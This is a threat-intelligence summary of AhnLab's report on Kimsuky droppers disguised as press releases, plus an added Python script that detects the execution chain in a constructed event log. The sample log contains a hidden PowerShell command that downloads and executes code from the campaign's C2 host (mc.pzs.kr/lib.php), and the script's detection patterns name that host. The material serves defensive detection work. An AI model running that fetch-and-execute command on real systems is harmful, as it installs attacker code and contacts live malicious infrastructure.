Kimsuky attack attempts impersonating press releases on various topics
2022-05-18 • AhnLab
AhnLab reported Kimsuky-linked attack attempts that delivered malware disguised as press releases, with lures including North Korea's acknowledgement of COVID-19 cases and other Korean public-announcement themes. The droppers were .NET executables carrying HWP or Word document icons. On execution they wrote a VBScript (referred to as Roamingtemp) under the user's AppData folder, launched it with wscript.exe, and downloaded a decoy document so the victim saw a normal file open while the malicious chain continued in the background. The script contacted paths on mc.pzs[.]kr and closely resembled the VBS code seen earlier in Kimsuky activity that impersonated requests for North Korea-related manuscripts. Follow-on stages created an OfficeAppManifest XML file under the Microsoft Windows Templates folder, registered a service named Microsoft, changed browser-related settings, and attempted to run PowerShell that retrieved content from lib.php on the same host.

The report lists downloader and MSILKrypt detections, multiple sample hashes, and URLs. For defenders, the useful pivots are the document-disguise execution chain (a document-icon .NET executable spawning wscript.exe on a script in AppData, followed by PowerShell fetching from lib.php), the service name and manifest file as host artifacts, and the reuse of mc.pzs[.]kr infrastructure and VBS code across Kimsuky campaigns.
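As an added example (not AhnLab's code and not taken from the report), the following Python script runs host-level detection rules for this chain over a constructed event log. The key=value record layout, the user and file names (press_release.hwp.exe, temp.vbs), and the double-extension heuristic for the document-icon dropper are assumptions; the mc.pzs.kr host, the lib.php path, the service name Microsoft and the OfficeAppManifest XML under the Templates folder come from the summary above.

```python
"""Triage of constructed endpoint events against the Kimsuky press-release
execution chain summarized above.  Added example, not AhnLab's code.  The
key=value record format, the file and user names, and the double-extension
heuristic are assumptions; the domain, lib.php path, service name and
OfficeAppManifest/Templates location come from the report summary."""
import re
from dataclasses import dataclass

C2_DOMAIN = "mc.pzs.kr"        # report infrastructure (defanged in the text)
C2_PATH = "lib.php"            # PowerShell stage fetched from that host
SERVICE_NAME = "microsoft"     # service registered by the follow-on stage

# Assumed heuristic: a .NET dropper carrying a document icon often also carries
# a document-looking double extension; the report only mentions the icon.
DOC_DOUBLE_EXT = re.compile(r"\.(hwp|docx?)\.exe$", re.IGNORECASE)
# Any .vbs launched from the user's roaming AppData folder.
VBS_IN_APPDATA = re.compile(r'\\appdata\\roaming\\[^\s"]*\.vbs', re.IGNORECASE)
# OfficeAppManifest XML written under a Microsoft\Windows\Templates folder.
MANIFEST_PATH = re.compile(
    r"\\microsoft\\windows\\templates\\.*officeappmanifest.*\.xml$", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    line_no: int
    detail: str


def parse_event(line):
    """Parse one constructed 'Key=value; Key=value' record into a dict."""
    fields = {}
    for part in line.split("; "):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def check_event(ev, line_no):
    """Return the Findings a single event triggers, in rule order."""
    out = []
    event_id = ev.get("EventID")
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "")
    if event_id == "1":  # process creation
        if image.endswith("wscript.exe") and VBS_IN_APPDATA.search(cmd):
            out.append(Finding("wscript_vbs_appdata", line_no, cmd))
        if DOC_DOUBLE_EXT.search(parent) and image.endswith(("wscript.exe", "cscript.exe")):
            out.append(Finding("doc_icon_exe_spawns_script", line_no, parent))
        if image.endswith("powershell.exe") and (
                C2_DOMAIN in cmd.lower() or C2_PATH in cmd.lower()):
            out.append(Finding("powershell_c2_fetch", line_no, cmd))
    elif event_id == "11":  # file creation
        target = ev.get("TargetFilename", "")
        if MANIFEST_PATH.search(target):
            out.append(Finding("officeappmanifest_dropped", line_no, target))
    elif event_id == "7045":  # new service installed
        if ev.get("ServiceName", "").lower() == SERVICE_NAME:
            out.append(Finding("service_named_microsoft", line_no, ev.get("ImagePath", "")))
    return out


def triage(log_text):
    """Run every rule over every non-empty line; findings come back in log order."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        if line.strip():
            findings.extend(check_event(parse_event(line), line_no))
    return findings


# Constructed sample log reproducing the chain described in the summary
# (names and paths are invented; the last line is benign Word usage).
SAMPLE_LOG = r"""
EventID=1; Image=C:\Users\victim\Downloads\press_release.hwp.exe; ParentImage=C:\Windows\explorer.exe; CommandLine="C:\Users\victim\Downloads\press_release.hwp.exe"
EventID=1; Image=C:\Windows\System32\wscript.exe; ParentImage=C:\Users\victim\Downloads\press_release.hwp.exe; CommandLine=wscript.exe //B C:\Users\victim\AppData\Roaming\temp.vbs
EventID=11; Image=C:\Windows\System32\wscript.exe; TargetFilename=C:\Users\victim\AppData\Roaming\Microsoft\Windows\Templates\OfficeAppManifest.xml
EventID=7045; ServiceName=Microsoft; ImagePath=C:\Windows\System32\wscript.exe C:\Users\victim\AppData\Roaming\temp.vbs
EventID=1; Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; ParentImage=C:\Windows\System32\wscript.exe; CommandLine=powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://mc.pzs.kr/lib.php')"
EventID=1; Image=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE; ParentImage=C:\Windows\explorer.exe; CommandLine="WINWORD.EXE" /n C:\Users\victim\Documents\report.docx
""".strip()

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.rule} -> {f.detail}")
```

The process-creation rules fire on the wscript.exe launch from AppData and on the PowerShell fetch, while the file-creation and service-install rules catch the persistence artifacts; the benign WINWORD line produces nothing. Against real Sysmon or EDR telemetry the same predicates apply to the Image, ParentImage, CommandLine, TargetFilename and ServiceName fields, and the C2 indicators should be swapped for the full URL list published in the report.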